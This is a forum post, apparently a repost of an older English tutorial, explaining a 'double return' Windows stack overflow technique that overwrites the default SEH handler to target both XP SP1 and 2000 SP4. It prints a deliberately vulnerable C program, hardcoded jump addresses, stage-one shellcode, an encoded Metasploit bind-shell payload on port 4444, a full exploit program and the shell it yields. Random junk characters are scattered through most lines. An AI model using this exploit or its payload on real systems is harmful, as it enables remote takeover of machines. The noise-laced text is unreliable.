QQ登录

只需要一步,快速开始

 注册地址  找回密码
查看: 2393|回复: 0
打印 上一主题 下一主题

Exploiting Default Exception Handler to Increase Exploit Sta

[复制链接]
字体大小: 正常 放大
韩冰        

823

主题

3

听众

4048

积分

我的地盘我做主

该用户从未签到

发帖功臣 元老勋章

跳转到指定楼层
1#
发表于 2004-11-19 10:39 |只看该作者 |倒序浏览
|招呼Ta 关注Ta
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.9 k2 ^, ~! O! k3 d* X: S6 p
' x/ C9 c* _" r- c, N) A
[Buf] <- Shellcode7 ]; J2 F, w: Y- N* O- l. i/ O8 y
[Return Address] <- jmp register (for Windows XP sp1)
' E5 P& l- c3 f( g; S1 {5 U) }[Various Stack Data] <- Junk9 }5 B4 ]' e; g; c6 Z
[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward
2 o% L3 g# n) W' p- B[SE Handler] <- jmp register (for Win2k sp4)) _) z1 ^7 l5 z$ [, l
[Stage1 Shellcode] <- stage1 shellcode for win2k3 V- ~! a# f( Z2 ?
' K2 M' C( v! h' a7 O& G8 {& Q$ C
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses, N5 v$ G- G# v
3 c% H: S& @8 G/ E8 C7 e# L
Necessary Tools:
; J6 B5 l9 G+ \8 D7 E- OllyDBG
9 F: V) `7 i5 d  H2 z! ~; w$ j- C/C++ Compiler4 j& h" A- @& G( a
- nasm1 o; s, H. T4 h
- Sac" B+ L; a6 N. c

% ~$ n, X; \' cVulnerable Code:
8 ~4 F9 J2 H6 _3 v* v/ x, C+ w//lamebuf.c
" ^: f: ?# u/ T, D1 A#include<stdio.h>
' [( q; b3 G3 |3 y4 V" f#include<string.h>
1 ]+ A2 q$ z0 k3 }( \  r#include<windows.h>
; G4 O9 z' P8 W& H: |7 [int main(int argc,char *argv[]){0 w; K$ g( i1 Z5 c3 W

4 d. }: W0 X( N# a* {4 C& y$ g' `char buf[512];& {/ a1 ?+ J% L1 V+ Y' c
char buf1[1024]; // <- simulate a stack
1 c) }' ^3 j* }; ]1 G& c* O//DebugBreak();
! N& ~0 u  r; s) xif (argc != 2){ return -1; }7 }3 j" Q/ C8 y0 P

8 T4 D/ o9 Z: Q. J6 i7 d% j7 astrcpy(buf,argv[1]);7 A4 P1 g* b/ {5 }6 e  R2 U7 S
return 0x0;3 f1 L  T5 t8 Z8 h0 V% F
}
9 K- n! j2 d3 Q+ W8 Y% Z8 P+ N3 j) x
Getting Started:
. O) M3 V9 i9 U* s) sBefore writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:
! F' c6 ^7 S" K# m2 l
+ ?) k6 H# h) @2 y+ z+ {, d# nEAX 00000000
& b6 b5 k; u/ |* LECX 00321404+ s- S: K2 k: B- m$ z5 K
EDX 00414141
6 G- Z8 I' P$ F, b8 `EBX 7FFDF0008 q$ s+ ?' K/ g6 ?
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
2 ~! Q' g) c' C& nEBP 41414141
- F6 a# `$ j% d9 nESI 77D4595F/ v) M- h% ~5 h2 B
EDI 77F59037 ntdll.77F59037
9 Y7 f. s/ ~- \' N" y0 eEIP 41414141( V0 m; O  D$ z# ~: T$ v+ x+ ~
% [, O) o( O6 B1 N6 T7 D
Lets take a look at the stack and see what happened to the default exception handler:
' l! M5 H) b9 y9 O0x0012FFB0 41414141 Pointer to next SEH Record, m6 c4 F- _5 b; d
0x0012FFB4 41414141 SE Handler
5 B3 o9 I: r. K5 H& l7 F; x2 z9 f2 ?! D
We successfully overwrote the return address and the default exception handler.
- Z5 D5 n& n, x7 F$ e4 l6 p4 r1 p1 u% I1 A3 b- o4 E  c. k  B; i
Primary Return Address (Windows XP SP1 EN):4 `; W* ^2 b; o8 Q
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:
$ F4 j3 _8 E& h; l"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"
. `1 j: d  l  v5 s8 O) w/ E: E) t5 @& Y! Y$ m
Secondary Return Address (Windows 2000 SP4 EN):" \  ~, [' S2 L8 g) h% x& @; o- O
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
0 r- H" t, E; `# b% P"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"7 N+ s+ D2 w+ I

) f+ R9 E  p8 ?7 Q- Y; tProof Of Concept:
7 @; g9 O* ~$ H: ?; w. J- H4 ?. u// exploit.c
4 }$ H: G. p' o5 A  N* h! {; ]// Tal zeltzer - [Double Return] //$ l) \  T1 u0 q  q$ H) {3 F

8 I8 ?2 m; I3 U& @6 z; P#include<stdio.h>
' w/ H3 B: O7 z2 ~#include<string.h>( e9 L5 o& l9 W& B- p0 w, y0 O
#include<windows.h>
. u* F: B9 v% {0 f" ]5 O
& ^/ E0 q6 A" i( a  S4 I#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
: m8 C$ i5 Z3 H& r  {#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx
5 T6 E) p: w$ ~! E9 p& y& ]
1 f. a" x) a& D9 x// Stage1 For WinXP Sp1 English; o( o0 K" H( V' d) s0 S' a5 G, z9 T
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";
3 f$ }3 J3 F) c2 h0 E7 W0 e& Q# M8 B# m" E5 P
// Stage1 For Win2k Sp4 English, p0 L) l- o' X; S  u6 M! A
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
( A/ P& K# E! q& H
+ o7 P6 A" E" _5 T+ r// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com
, u& R+ y& @& G  x5 V2 E; junsigned char shellcode[] =/ ]( I7 g5 B( A$ b
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"/ c! d: z5 _9 X7 e0 o
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"( N( u4 F- E& q) ~
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"( W% g3 |; ]+ ^  I% _$ {
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"6 q! K7 U1 o( [, M
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
# k$ y% K4 a, O8 e: N"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"! m" `. Y$ j& J% I$ q' \' J4 d( V
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14". U' ?" B; V0 @0 I& s
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"' W( ^4 B; l/ _3 z& y4 g
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"- f8 g2 J. z# @, [. z# w
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
& X: C; x8 m+ b* \- s" u$ F"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"% q: l  O4 L3 s- J1 w
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
3 G+ s* e+ e% F0 e1 {"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"4 G) L' a' E2 E
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"6 M( z% s- \% q$ m4 a2 R
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"% D' b9 U: ]9 N" e1 B3 t6 G; C
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"- g* v, F0 @- X8 g( @# p% A3 g
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
& }3 p3 T$ @3 a"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
, q; t" o! V& x1 V7 z+ b4 ~"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"8 i; W3 w$ X8 x0 c, z! I6 S
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"; m( o# @2 h/ D
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"( r1 w" p; z3 M1 U$ G4 O
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"7 n2 m% M! ?6 Z5 w4 V/ L
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"8 ^# D! ^" `) K' a) Z% r
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
, x& p5 W5 y1 v  K"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
1 ^0 X% W# A  _4 Z/ m1 \1 I6 ]: X/ w+ Q% L7 T# T: k

8 T9 r- y4 l. P9 Nint main(int argc,char *argv[]){
, Z5 B  U: d, w# y) j& I
0 }0 Z$ @0 Q9 }% J3 V) h3 _. hchar *bufExe[3];8 I- ^: T( y7 r/ h
char buf[2048];. s. d8 E& S$ x0 I/ Q0 O
bufExe[0] = "lamebuf.exe";  ?8 p/ t+ E- k8 q: ^/ @0 \0 [
bufExe[2] = NULL;
4 d; v+ }$ x9 Y: J$ j" \
# k( ^$ q+ d+ o6 \5 q0 v" R1 @9 Dmemset(buf,0x0,sizeof(buf));
# o+ L: q! T! W( q* Tmemset(buf,0x90,1652);
. p" s8 D1 r! L0 X# L4 ememcpy(&buf[24],shellcode,sizeof(shellcode)-1);
/ u2 T" Z$ I& z1 u# P9 V, E
) _; q+ _7 D% S% J1 J/ zmemcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode
' g  Q5 t- r! _. r# y5 zmemcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode( g7 @) i0 ^! x! t: m

& |9 ^& B2 m# C9 G* n8 ?0 r*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en( U% u$ E5 s# R. G: i
*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code
! p3 d  ~" _( ~*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en
5 O; G: Q: v# Y, V) b3 p1 H- D- g* P. v: h4 O8 A0 N) k/ g
: R( Q  y% H3 f3 C; E* `6 V1 z! e" I
bufExe[1] = buf;1 V9 A+ X, K4 G1 ~6 b: z
//Execute the vulnerable application# o+ _+ k  _1 U% @6 q9 _
execve(bufExe[0],bufExe,NULL);
- X4 A+ R- ]  m$ D" f0 K/ P- s5 W, w+ i' p" J5 B: O% X3 N( w- Y
return 0x0;7 \* m5 c) X! r: Z$ ~# O
}. x& o; ^. q; f* K. o& [% L" |( {1 q
" P% |% D" m1 G
Exploit under Windows XP SP1:# O: l: c' a% z* D4 @
C:\>exploit
6 y# ?3 S- M& x" @' m; h& f- R- z) nC:\>& h% b( @8 Z5 _1 U* [; {' d
C:\>telnet 127.0.0.1 4444
8 C( i' ~4 ^! ?- Y7 S* g  O; n( t6 Y( f) V  D
Microsoft Windows XP [Version 5.1.2600]
9 U+ P. Y- ^/ `; P(C) Copyright 1985-2001 Microsoft Corp.
' m: H- `' {' q6 g0 z5 `2 j9 c2 |# ^! @' P
C:\>
, o4 `4 u: E/ H6 |; ~# F; |1 ^+ `/ Q6 r: f1 j
Exploit under Windows 2000 SP4:) L( w- M2 q% t3 j) i# m4 q
C:\>exploit
% K4 L: E- t) m' UC:\>
# ^, I5 w4 N! _C:\>telnet 127.0.0.1 44441 ?3 [5 B; T9 S: \

2 v; i2 K3 j% D2 @* Y+ ?. yMicrosoft Windows 2000 [Version 5.00.2195]
. N, @8 Q! v+ l9 [) _3 v2 L0 H+ S7 k(C) Copyright 1985-2000 Microsoft Corp.
zan
转播转播0 分享淘帖0 分享分享0 收藏收藏0 支持支持0 反对反对0 微信微信
您需要登录后才可以回帖 登录 | 注册地址

qq
收缩
  • 电话咨询

  • 04714969085
fastpost

关于我们| 联系我们| 诚征英才| 对外合作| 产品服务| QQ

手机版|Archiver| |繁體中文 手机客户端  

蒙公网安备 15010502000194号

Powered by Discuz! X2.5   © 2001-2013 数学建模网-数学中国 ( 蒙ICP备14002410号-3 蒙BBS备-0002号 )     论坛法律顾问:王兆丰

GMT+8, 2026-4-18 18:27 , Processed in 0.413985 second(s), 51 queries .

回顶部